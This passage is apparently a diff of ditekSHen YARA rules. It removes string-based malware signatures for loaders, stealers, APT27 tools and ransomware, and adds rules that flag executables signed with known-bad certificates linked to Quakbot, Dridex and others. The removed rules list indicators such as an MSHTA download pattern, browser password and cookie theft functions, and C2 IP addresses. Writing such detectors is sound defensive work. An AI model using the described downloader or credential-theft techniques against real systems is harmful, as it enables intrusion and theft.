+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JESEN LESS d.o.o." and pe.signatures [ i ] . serial == "89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" )
 }
-rule DITEKSHEN_MALWARE_Win_Pureloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7D27332C3Cb3A382A4Fd232C5C66A2 : FILE
 {
 	meta:
-		description = "Detects Pure loader / injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ad44a12a-4ac7-5cc7-92ab-13c23514de69"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5366-L5382"
+		id = "d9f0d30b-ac9d-57f9-8220-c6a376fe68db"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8161-L8174"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1f0bd20e769ea79d28d6e60ca06aa8aa2b3436426cfe0cd4f2023a08236875cd"
+		logic_hash = "d21218469ae41def8eed3d2cff38744ae928d9e8fed8ff68c539d33193136e0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "InvokeMember" fullword wide
-		$s2 = "ConcatProducer" fullword wide
-		$s3 = ".Classes.Resolver" wide
-		$s4 = "get_DLL" fullword ascii
-		$s5 = "BufferedStream" fullword ascii
-		$s6 = "GZipStream" fullword ascii
-		$s7 = "MemoryStream" fullword ascii
-		$s8 = "Decompress" fullword ascii
-		$s9 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii
+		thumbprint = "935af7361c09f45dcf3fa6e4f4fd176913c47673104272259b40de55566cabed"
+		reason = "Silence"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures [ i ] . serial == "7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" )
 }
-rule DITEKSHEN_MALWARE_Win_VBS_Dlagent01
+
+rule DITEKSHEN_INDICATOR_KB_CERT_40F5660A90301E7A8A8C3B42 : FILE
 {
 	meta:
-		description = "Detects VBS MSHTA downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "447ea323-ecab-5f6b-b13e-0690254c754e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5384-L5395"
+		id = "c3c8fbdf-49ca-5898-b267-74256154973a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8176-L8189"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e47839a55773764aca0aebcf1078c06c729b86d1e2f18d7d64e3bb11e87f3eb"
+		logic_hash = "ed584aa8ad833066ed9f7ddbf98dc75efe88e0b7e69f564a90eade63dc2aee2d"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "llehS.tpircsW" ascii
-		$s2 = ".Run" ascii
-		$s3 = "mshta http" ascii nocase
-		$s4 = "StrReverse" ascii
+		tags = "FILE"
+		thumbprint = "2ac041e3c46c82fbcee34617ee31336e845e18efe6b9ae5c8811351db5b56da2"
+		reason = "Cobalt Strike"
+		importance = 20
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Booz Allen Hamilton Inc." and pe.signatures [ i ] . serial == "40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" )
 }
-rule DITEKSHEN_MALWARE_Win_Ranumbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Dfc1F1B0F205Cc17Ed7D216Bb991F859 : FILE
 {
 	meta:
-		description = "Detects RanumBot / Windigo / GoStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "26a0832e-8a39-5a0e-bd39-710744212c16"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5397-L5430"
+		id = "93d5fd87-af92-5449-9d02-4666afa38fff"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8191-L8204"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9c32445e62d072e4184d25497696ef6225edb176dc7a9743a54194d4ddb4b0c"
+		logic_hash = "24783267ab27f8102f724810322a7fbb010b7a2abf59ad206b96a3eb75968907"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$f1 = "main.addSchedulerTaskSSH" fullword ascii
-		$f2 = "main.attackRouter" fullword ascii
-		$f3 = "main.decryptPassword" fullword ascii
-		$f4 = "main.handleScanRequest" fullword ascii
-		$f5 = "main.scanNetwork" fullword ascii
-		$f6 = "main.extractCredentials" fullword ascii
-		$s1 = "H_T= H_a= H_g= MB,  W_a= and  h_a= h_g= h_t= max= ptr  siz= tab= top= u_a= u_g=%s/16%s:%d%s:22+0330+0430+0530+0545+0630+0845+10" ascii
-		$s2 = "<== as  at  fp= is  lr: of  on  pc= sp: sp=) = ) m=+Inf, n -Inf00%x112212343125: p=ABRTACDTACSTAEDTAESTAKDTAKSTALRMAWSTAhomAtoiCESTChamDashEESTGOGCJulyJuneKILLLEAFLisuMiaoModiNZDTNZSTNewaPIPEQUITSASTSEGVTERMThai" ascii
-		$s3 = "W*struct { P *big.Int; Q *big.Int; G *big.Int; Y *big.Int; Rest []uint8 \"ssh:\\\"rest\\\"\" }" ascii
-		$s4 = "policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write" ascii
-		$s5 = "/Users/alexander/go/src/mikrotik/winbox.go" ascii
-		$xf1 = "main.readConfig" fullword ascii
-		$xf2 = "main.ensureRunningAsUser" fullword ascii
-		$xf3 = "main.configRegPath" fullword ascii
-		$xf4 = "main.oldConfigRegPath" fullword ascii
-		$uf1 = "main.locateChrome" fullword ascii
-		$uf2 = "main.decryptAndUploadProfile" fullword ascii
-		$uf3 = "main.decryptCookies" fullword ascii
-		$uf4 = "main.extractPasswords" fullword ascii
-		$uf5 = "main.getFirefoxProfile" fullword ascii
-		$uf6 = "main.postBrowsersData" fullword ascii
-		$uf7 = "main.uploadFirefoxProfile" fullword ascii
-		$uf8 = "main.zipFirefoxProfile" fullword ascii
-		$uf9 = /main\.detect(Browsers|Chrome|Coccoc|Edge|Firefox|InternetExplorer|Opera|Yandex)/ fullword ascii
+		thumbprint = "b577362c1abcfb7d163b8702f23a6a3643c72ea0a3c8cf262092903a3110fa04"
+		reason = "PrivateLoader"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or 4 of ( $s* ) or ( 2 of ( $f* ) and 2 of ( $s* ) ) or ( all of ( $xf* ) and 1 of ( $uf* ) ) or 6 of ( $uf* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Astori LLC" and pe.signatures [ i ] . serial == "df:c1:f1:b0:f2:05:cc:17:ed:7d:21:6b:b9:91:f8:59" )
 }
-rule DITEKSHEN_MALWARE_Win_Dllhijacker01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_E573D9C8B403C41Bd59Ffa0A8Efd4168 : FILE
 {
 	meta:
-		description = "Hunt for VSNTAR21 / DllHijacker01 IronTiger / LuckyMouse / APT27 malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0a858058-310a-5b1c-a6fe-abdec7b25abe"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5432-L5448"
+		id = "683ea9a6-2002-5c48-8512-51f65e70dd2c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8206-L8219"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48535c0bb5342e2f91ac9d015c761d8d543b122dd3cc08b7029631fcf3037bfb"
+		logic_hash = "ec53ab007d8be2f3cad45e787e724c5af0dd3f18c2b66a179b822bdeeb0d1560"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "libvlc_add_intf" fullword ascii
-		$s2 = "libvlc_dllonexit" fullword ascii
-		$s3 = "libvlc_getmainargs" fullword ascii
-		$s4 = "libvlc_initenv" fullword ascii
-		$s5 = "libvlc_set_app_id" fullword ascii
-		$s6 = "libvlc_set_app_type" fullword ascii
-		$s7 = "libvlc_set_user_agent" fullword ascii
-		$s8 = "libvlc_wait" fullword ascii
-		$s9 = "dll.dll" fullword ascii
+		thumbprint = "a9ab2be0ea677c6c6ed67b23cfee0fa44bfb346a4bb720f10a3f02a78b8f5c82"
+		reason = "Dridex"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VERONIKA 2\" OOO\"" and pe.signatures [ i ] . serial == "e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" )
 }
-rule DITEKSHEN_MALWARE_Win_Hyperbro02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2F38De4Ced0B070973B9E9B9B1Dcfa7F : FILE
 {
 	meta:
-		description = "Detects HyperBro IronTiger / LuckyMouse / APT27 malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1880afd7-ca06-5b43-af8f-e791ded0d7d8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5450-L5474"
+		id = "39910712-4a11-5722-9b48-c069bfcefb14"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8221-L8234"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca4ee116516549fc42f7e32b3c24d631b7f2c638efbde5c07227358e78fd6f35"
+		logic_hash = "84c3d89e8393bcaddea53326730d795f482ec65c574fde5c1c81f395178b591a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\cmd.exe /A" fullword wide
-		$s2 = "C:\\windows\\explorer.exe" fullword wide
-		$s3 = "\\\\.\\pipe\\testpipe" fullword wide
-		$s4 = "Elevation:Administrator!new:{" wide
-		$s5 = "log.log" fullword wide
-		$s6 = "%s\\%d.exe" fullword wide
-		$s7 = ".?AVTPipeProtocol@@" fullword ascii
-		$s8 = ".?AVTCaptureMgr@@" fullword ascii
-		$s9 = "system-%d" fullword wide
-		$s10 = "[test] %02d:%02d:%02d:%03d %s" fullword wide
-		$s11 = "\\..\\data.dat" fullword wide
-		$s12 = "\\..\\config.ini" fullword wide
-		$s13 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 77 00 6f 00 72 00 6b 00 65 00 72 00 }
-		$s14 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 64 00 61 00 65 00 6d 00 6f 00 6e 00 }
-		$cnc1 = "https://%s:%d/ajax" fullword wide
-		$cnc2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" fullword wide
-		$cnc3 = "139.180.208.225" fullword wide
+		thumbprint = "71382f6c6e48df51f15606380cd6948bf37f044d18566ebc2d262fc87e70b9b1"
+		reason = "Gh0stRAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 2 of ( $cnc* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fahad Malik" and pe.signatures [ i ] . serial == "2f:38:de:4c:ed:0b:07:09:73:b9:e9:b9:b1:dc:fa:7f" )
 }
-rule DITEKSHEN_MALWARE_Win_Dllhijacker02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_53E1F226Cb77574F8Fbeb5682Da091Bb : FILE
 {
 	meta:
-		description = "Detects ServiceCrt / DllHijacker03 IronTiger / LuckyMouse / APT27 malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "de5eee06-570a-5ec3-9e1b-13de4c4f260f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5512-L5527"
+		id = "6967042e-156b-541d-970c-491dece12f08"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8236-L8249"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d4eb236256c413d4d3223cc897783f5631c7798c0f3280e72d8c8504438fcaf9"
+		logic_hash = "41f4902e9d02254efdfd19a73de16e1128b15d264c3ed128d5ec28bd92f2d8a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ServiceCrtMain" fullword ascii
-		$s2 = "mpsvc.dll" fullword ascii
-		$o1 = { 84 db 0f 85 4c ff ff ff e8 14 06 00 00 8b f0 83 }
-		$o2 = { f7 c1 00 ff ff ff 75 c5 eb 13 0f ba 25 10 20 01 }
-		$o3 = { 8d 04 b1 8b d9 89 45 fc 8d 34 b9 a1 18 20 01 10 }
-		$o4 = { b0 01 c3 68 b8 2c 01 10 e8 83 ff ff ff c7 04 24 }
-		$o5 = { eb 34 66 0f 12 0d 00 fe 00 10 f2 0f 59 c1 ba cc }
-		$o6 = { 73 c7 dc 0d 4c ff 00 10 eb bf dd 05 34 ff 00 10 }
+		thumbprint = "d247ec7e224a24683da3f138112ffc9607f83c917d6c45494dd744d732249260"
+		reason = "SystemBC"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 5 of ( $o* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OdyLab Inc" and pe.signatures [ i ] . serial == "53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" )
 }
-rule DITEKSHEN_MALWARE_Win_Zeoticus : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Df2547B2Cab5689A81D61De80Eaaa3A2 : FILE
 {
 	meta:
-		description = "Detects Zeoticus ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6d1096dd-d075-54eb-ade9-48e2f945145d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5529-L5549"
+		id = "4eba17f8-df3c-552d-90b5-faef7b860203"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8251-L8264"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "588c140c141e82dae56758550549dfb96410db50521ac546477e1adc5575b4a0"
+		logic_hash = "c32a6510bd3cfd09e84ccf36140eb405945059c981fb1888298501493f6ef68f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Dear %s" fullword wide
-		$s2 = "\\??\\UNC\\%s\\%s\\" wide
-		$s3 = "\\\\%ws\\admin$\\%ws" wide
-		$s4 = "%s /node:\"%ws\" /user:\"%ws\" /password:" wide
-		$s5 = "process call create" wide
-		$s6 = ">----===Zeoticus" ascii
-		$s7 = "ZEOTICUSV2" ascii
-		$s8 = "GetExtendedTcpTable" fullword ascii
-		$s9 = "SHAMROckSWTF" ascii
-		$s10 = "NTDLL.RtlAllocateHeap" fullword ascii
-		$s11 = ".pandora" fullword wide
-		$s12 = { 70 00 20 00 72 00 20 00 69 00 20 00 76 00 20 00 65 00 20 00 74 }
-		$pdb = "_cryptor\\shell_gen\\Release\\" ascii
+		thumbprint = "4c6e21a6e96ea6fae6c142c2d1c919f590d9bf4e5c6b0f3ec7f9b0a38f3ce45d"
+		reason = "IcedID"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( $pdb ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures [ i ] . serial == "df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent11 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_58Af00Ce542760Fc116B41Fa92E18589 : FILE
 {
 	meta:
-		description = "Detects downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c8bf9b1a-4ec1-5291-a334-82c79980ef53"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5551-L5564"
+		id = "62fd5f76-b890-5532-8c6f-e26942584899"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8266-L8279"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "61df4855766050237c0b67bf70684020beb5d88f5928fa2814077e505be938a6"
+		logic_hash = "bcabd77b40ad9eae4c499c8cd4b3e3d39e5478fa590be536860375e890c1b62e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pdb = "\\loader2\\obj\\Debug\\loader2.pdb" ascii
-		$s1 = "DownloadFile" fullword ascii
-		$s2 = "ZipFile" fullword ascii
-		$s3 = "WebClient" fullword ascii
-		$s4 = "ExtractToDirectory" fullword ascii
-		$s5 = "System Clear" fullword ascii
+		thumbprint = "620dafea381ab657e0335321ca5a95077f33021927a32d5d62bff7e33704f4b7"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( ( $pdb ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures [ i ] . serial == "58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" )
 }
-rule DITEKSHEN_MALWARE_Win_Softcnapp : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5B1F9Ec88D185631Ab032Dbfd5166C0D : FILE
 {
 	meta:
-		description = "Detects SoftCNApp"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "473442e2-d411-5e2b-948e-c7ce034a5810"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5566-L5583"
+		id = "233466e6-7b5f-50d7-967a-976b698e9194"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8281-L8294"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2d7f4320282218842fa2e82906bcaf691610ad1a6ea257a2a9fc9e062229a2e8"
+		logic_hash = "05428b4e636a60fb409ead0f4aeb25ed08dae24d58c98a17bb77aa521706763a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\\\.\\PIPE\\SOC%d" fullword ascii
-		$s2 = "Mozilla/5.0 (Windows NT 6.1)" fullword ascii
-		$s3 = "Param: sl=%d; sl=%d; sl=%d; sl=%d; sl=%d;" fullword ascii
-		$s4 = ".?AVCHPPlugin@@" fullword ascii
-		$s5 = ".?AVCHPCmd@@" fullword ascii
-		$s6 = ".?AVCHPExplorer@@" fullword ascii
-		$s7 = "%s\\svchost.exe -O" fullword wide
-		$s8 = "\"%s\\%s\" -P" fullword ascii
-		$n1 = "45.63.58.34" fullword ascii
-		$n2 = "127.0.0.1" fullword ascii
+		thumbprint = "a46234c01e9f9904e500aefad4b5718d86aaec4e084b3d8ffbfe5724f8ddda45"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $n* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures [ i ] . serial == "5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" )
 }
-rule DITEKSHEN_MALWARE_Win_Covenantgruntstager : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : FILE
 {
 	meta:
-		description = "Detects Covenant Grunt Stager"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "61495541-ed9c-5227-aa50-cbaeacfb20a2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5585-L5606"
+		id = "452d9f84-a950-5503-adaf-fba95b45e798"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8296-L8309"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "638f63f605b21154f062b0f4d0659cd6cd87aee319debb2c1a991a679fec087a"
+		logic_hash = "e439f15c3312ed3a1840967bb165300a491ffe3d1c9c629abcbebf3efd9b1f50"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "c75025c80ab583a6ab87070e5b65c93cb59b48e0cbb5f99113e354a96f8fcd39"
+		reason = "Quakbot"
+		importance = 20
 
-	strings:
-		$x1 = "VXNlci1BZ2VudA" ascii wide
-		$x2 = "cGFnZT17R1VJRH0mdj0x" ascii wide
-		$x3 = "0eXBlPXtHVUlEfSZ2PTE" ascii wide
-		$x4 = "tZXNzYWdlPXtHVUlEfSZ2PTE" ascii wide
-		$x5 = "L2VuLXVzL" ascii wide
-		$x6 = "L2VuLXVzL2luZGV4Lmh0bWw" ascii wide
-		$x7 = "L2VuLXVzL2RvY3MuaHRtbD" ascii wide
-		$s1 = "ExecuteStager" ascii
-		$s2 = "UseCertPinning" fullword ascii
-		$s3 = "FromBase64String" fullword ascii
-		$s4 = "ToBase64String" fullword ascii
-		$s5 = "DownloadString" fullword ascii
-		$s6 = "UploadString" fullword ascii
-		$s7 = "GetWebRequest" fullword ascii
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK ANNA LIMITED" and pe.signatures [ i ] . serial == "ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" )
+}
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : FILE
+{
+	meta:
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "4d845dd7-4153-5082-bff0-d5f9a7b4b46e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8311-L8324"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "7b53d30e5b6176eaae854bf4046339864225b417a147fe6f24fb51dfb0535911"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "1ef38b7c430c09062f4408c47da14d814be5e2e99749e65a2cf097f5610024fc"
+		reason = "Matanbuchus"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADVANCED ACCESS SERVICES LTD" and pe.signatures [ i ] . serial == "ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" )
 }
-rule DITEKSHEN_MALWARE_Win_Fabookie : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4728189Fa0F57793484Cdf764F5E283D : FILE
 {
 	meta:
-		description = "Detects Fabookie / ElysiumStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dfa653c4-37d9-5e31-9c47-23adf751e4aa"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5608-L5624"
+		id = "02ec531e-aa1b-50b8-ae32-d885a0185cfe"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8326-L8339"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bbe10323817d501a361a33abf61a49ad59fcac69d78d9d9ec1744ee99a4b4629"
+		logic_hash = "181971946ee4d643430b733ed57ccf07c940205853c9e5102b08b7bc509bcc63"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "rwinssyslog" fullword wide
-		$s2 = "_kasssperskdy" fullword wide
-		$s3 = "[Title:%s]" fullword wide
-		$s4 = "[Execute]" fullword wide
-		$s5 = "[Snapshot]" fullword wide
-		$s6 = "Mozilla/4.0 (compatible)" fullword wide
-		$s7 = "d-k netsvcs" fullword wide
-		$s8 = "facebook.websmails.com" fullword wide
-		$s9 = "CUdpClient::Start" fullword ascii
